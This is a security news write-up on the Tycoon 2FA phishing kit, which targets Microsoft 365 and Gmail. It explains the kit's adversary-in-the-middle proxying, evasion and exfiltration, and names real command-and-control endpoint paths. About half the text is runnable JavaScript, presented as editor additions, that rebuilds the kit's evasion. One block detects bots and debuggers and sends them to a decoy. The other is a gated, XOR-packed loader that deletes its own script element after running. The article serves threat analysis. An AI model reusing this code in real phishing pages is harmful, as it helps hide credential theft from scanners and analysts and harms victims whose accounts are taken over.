Attack Techniques of Tycoon 2FA Phishing Kit Targeting Microsoft 365 and Gmail Accounts Detailed


The Tycoon 2FA phishing kit has emerged as one of the most sophisticated Phishing-as-a-Service platforms since its debut in August 2023, specifically engineered to circumvent two-factor and multi-factor authentication on Microsoft 365 and Gmail accounts.

The kit uses an Adversary-in-the-Middle approach: a reverse proxy sits between the victim and the real login service, so the victim interacts with the genuine login interface relayed through the attacker's server while credentials, one-time codes and the resulting session cookie are captured in transit, in real time.

According to the Any.run malware trends tracker, Tycoon 2FA leads with over 64,000 reported incidents this year, making it one of the most prevalent phishing threats in the current landscape.

The attack spreads through multiple distribution vectors including malicious PDF documents, SVG files, PowerPoint presentations, and emails containing phishing links.

Threat actors have also hosted fake login pages on reputable cloud platforms such as Amazon S3 buckets, Canva, and Dropbox, so URL and domain reputation checks in traditional security solutions are less likely to flag the lure.

What makes this campaign particularly dangerous is that it defeats code-based second factors even when they are enabled: the one-time code the victim types is relayed to the real service, and the session cookie issued after a successful login is captured, giving the attacker an authenticated session. Only phishing-resistant, origin-bound factors such as FIDO2/WebAuthn security keys or passkeys resist this class of attack, because the browser will not release such a credential to the proxy's domain.


Cybereason analysts identified that the phishing kit implements multiple pre-redirection checks as defense mechanisms against detection, including domain verification, CAPTCHA challenges, bot and scanning-tool detection, and debugger checks that look for security researchers stepping through the code.

These checks ensure that only genuine victims reach the final phishing page, while automated security tools and analysts are redirected to benign websites; a sandbox that cannot pass them never sees the credential-harvesting stage at all.
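The following is an added illustration of those pre-redirection checks, written by the editor and not taken from the kit or from Cybereason's report. It models the three checks that can be expressed as code (domain verification, bot detection, debugger detection) as pure functions over injected `loc`, `nav` and `now` objects so the logic runs under Node without a browser; the host list, user-agent patterns, timing threshold and visitor profiles are constructed assumptions.

```javascript
// Added example, not code from the kit or from Cybereason's report: the
// pre-redirection checks described above, as pure functions over injected
// `loc`, `nav` and `now` objects so they run under Node without a browser.
// Host list, UA patterns, threshold and visitor profiles are constructed.

const ALLOWED_HOSTS = new Set(['login-portal.example']); // assumed operator domain

// 1. Domain verification: refuse to render unless served from the operator's
//    host, which defeats saved-HTML replay and mirrored copies in a sandbox.
function domainOk(loc) {
  return ALLOWED_HOSTS.has(String(loc.hostname || '').toLowerCase());
}

// 2. Bot and scanning-tool detection: automation flags and tell-tale UAs.
const SCANNER_UA = /headless|phantomjs|selenium|puppeteer|playwright|curl\/|python-requests|wget/i;
function looksAutomated(nav) {
  if (nav.webdriver === true) return true;                // set by WebDriver-driven browsers
  if (SCANNER_UA.test(nav.userAgent || '')) return true;
  if (!Array.isArray(nav.languages) || nav.languages.length === 0) return true; // bare headless profiles
  return false;
}

// 3. Debugger check: `debugger` only pauses when an inspector is attached, so
//    wall-clock time across it is large exactly when an analyst is watching.
function debuggerAttached(now, thresholdMs = 100) {
  const t0 = now();
  debugger; // no-op without an attached inspector
  return now() - t0 > thresholdMs;
}

// Route a visitor: anything that fails a check gets a benign decoy; only a
// plausible human continues to the (CAPTCHA-gated) phishing flow.
function routeVisitor({ loc, nav, now = Date.now }) {
  if (!domainOk(loc)) return 'decoy:domain';
  if (looksAutomated(nav)) return 'decoy:bot';
  if (debuggerAttached(now)) return 'decoy:debugger';
  return 'phish';
}

// Constructed visitor profiles for a stand-alone run.
const VICTIM = {
  loc: { hostname: 'login-portal.example' },
  nav: { userAgent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0', languages: ['en-US'], webdriver: false },
};
const HEADLESS = {
  loc: { hostname: 'login-portal.example' },
  nav: { userAgent: 'Mozilla/5.0 HeadlessChrome/124.0', languages: [], webdriver: true },
};
const MIRROR = { loc: { hostname: 'sandbox.local' }, nav: VICTIM.nav };

// Fake clock that jumps 500 ms across the `debugger` statement, as a real
// clock would while an analyst sits on the breakpoint.
function pausedClock() { let t = 0; return () => (t += 500); }

function demo() {
  return {
    victim: routeVisitor(VICTIM),
    headless: routeVisitor(HEADLESS),
    mirror: routeVisitor(MIRROR),
    analyst: routeVisitor({ ...VICTIM, now: pausedClock() }),
  };
}
```

For a sandbox or crawler the practical reading is the inverse: to reach the final page it must be served from the expected host, present a non-automated `navigator`, and not stall on `debugger` statements.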

The kit also demonstrates an advanced understanding of organizational security policies by analyzing error messages from login attempts, allowing attackers to tailor their campaigns for maximum effectiveness.

The technical sophistication extends to boilerplate templates that generate the fake login page dynamically from the actual responses of Microsoft's servers, so the victim sees exactly the prompt the real service would show; the MFA code the victim enters is relayed to the legitimate server in real time, completing the login on the attacker's behalf.

Multi-Stage JavaScript Execution and Credential Harvesting

The attack unfolds through a complex multi-stage JavaScript execution chain designed to evade detection while harvesting credentials.

Figure: Attack chain (Source – Cybereason)

The initial HTML page loads a JavaScript file whose payload is compressed with the LZ-string algorithm and then base64-encoded; at runtime the script decompresses the blob and executes the recovered code in memory, so the clear-text stage never appears in the file that was served.

The second stage employs a technique called the DOM Vanishing Act: the malicious JavaScript removes its own script element from the Document Object Model after execution, leaving no visible trace for security tools that inspect the rendered page.

The script contains three different base64-encoded payloads, each designed to run only under specific conditions.

The first payload is obfuscated with an XOR cipher and executes only when the segments of window.location.pathname (split on "/") contain an exclamation mark or dollar sign, a marker present in the crafted phishing link but absent when a scanner or crawler reaches the host on its own.
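The loader pattern described above, as an added example written by the editor and not code from the kit or from Cybereason's report. It packs a stage as XOR-then-base64 (standing in for the kit's LZ-string and XOR stages, whose keys are not on the page), gates execution on the pathname marker, executes the decoded source, and then removes its own `<script>` element from a minimal stand-in for `document` so it runs under Node. The key, the sample stage and the DOM stub are constructed.

```javascript
// Added example, not code from the kit or from Cybereason's report: a gated,
// self-erasing loader stage. XOR + base64 stands in for the kit's LZ-string
// and XOR packing; SAMPLE_KEY, SAMPLE_STAGE and the DOM stub are constructed.

// XOR every byte of `data` with the repeating `key` (symmetric: same call
// encodes and decodes).
function xorBytes(data, key) {
  const out = Buffer.alloc(data.length);
  for (let i = 0; i < data.length; i++) out[i] = data[i] ^ key[i % key.length];
  return out;
}

// Attacker side: hide a stage's JavaScript source as XOR-then-base64.
function packStage(source, key) {
  return xorBytes(Buffer.from(source, 'utf8'), Buffer.from(key, 'utf8')).toString('base64');
}

// Victim side, or analyst side once the key is known: recover the source.
function unpackStage(b64, key) {
  return xorBytes(Buffer.from(b64, 'base64'), Buffer.from(key, 'utf8')).toString('utf8');
}

// Gate: run only if some path segment carries a '!' or '$' marker, which the
// crafted phishing URL includes and a crawler that only knows the host does not.
function passesGate(pathname) {
  return pathname.split('/').some(seg => seg.includes('!') || seg.includes('$'));
}

// Loader: decode, execute, then delete the carrier <script> element so a
// later DOM inspection finds nothing ("DOM Vanishing Act").
// `doc` stands in for `document`, `loc` for `window.location`.
function runStage(doc, loc, b64, key) {
  if (!passesGate(loc.pathname)) return null;          // scanners fall through to benign content
  const source = unpackStage(b64, key);
  const result = new Function('doc', source)(doc);     // stand-in for eval(...) of the stage
  const self = doc.currentScript;
  if (self && self.parentNode) self.parentNode.removeChild(self);
  return result;
}

// Minimal DOM stand-in so the example runs under Node: a body holding one
// <script> element, which is also document.currentScript.
function makeFakeDom() {
  const body = {
    children: [],
    removeChild(el) { this.children = this.children.filter(c => c !== el); },
  };
  const script = { tag: 'script', parentNode: body };
  body.children.push(script);
  return { body, currentScript: script };
}

// Constructed sample stage: reports how many scripts were in the body when it ran.
const SAMPLE_KEY = 'k3y';
const SAMPLE_STAGE = "return 'stage-2 ran, scripts in body: ' + doc.body.children.length;";
const SAMPLE_BLOB = packStage(SAMPLE_STAGE, SAMPLE_KEY);

function demo() {
  const dom = makeFakeDom();
  const hit = runStage(dom, { pathname: '/a1b!c2d' }, SAMPLE_BLOB, SAMPLE_KEY);
  const miss = runStage(makeFakeDom(), { pathname: '/login' }, SAMPLE_BLOB, SAMPLE_KEY);
  return { hit, scriptsLeft: dom.body.children.length, miss };
}
```

The analyst-side lesson is in `unpackStage`: once the key and the packing order are read out of the loader, every gated payload can be recovered offline without satisfying the gate, which is how the three conditional payloads on the page were separated in the first place.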

Figure: Email extraction (Source – Cybereason)

The email extraction step builds a custom string by appending "WQ" to the victim's email address and exfiltrates it to the command-and-control server with a POST request to /zcYbH5gqRHbzSQXiK8YtTbhpNSGtkZc6xbMyRBGazbWU8fjfq; the server answers with AES-encrypted payloads that the page decrypts using the CryptoJS library.

When victims enter credentials into the fake login page, the attacker acting as a middleman immediately receives the information and submits it to legitimate Microsoft servers.

The victim's page is then updated dynamically from the real server's responses using web parts, so each step of the proxied login (password, MFA prompt, consent) looks exactly as it would on the genuine site.

The final JavaScript payload collects browser information, including navigator.userAgent, and queries geolocation services, then encrypts the gathered data with a hardcoded key before transmitting it to the attacker's endpoint at /tdwsch3h8IoKcUOkog9d14CkjDcaR0ZrKSA95UaVbbMPZdxe, completing the credential theft operation.
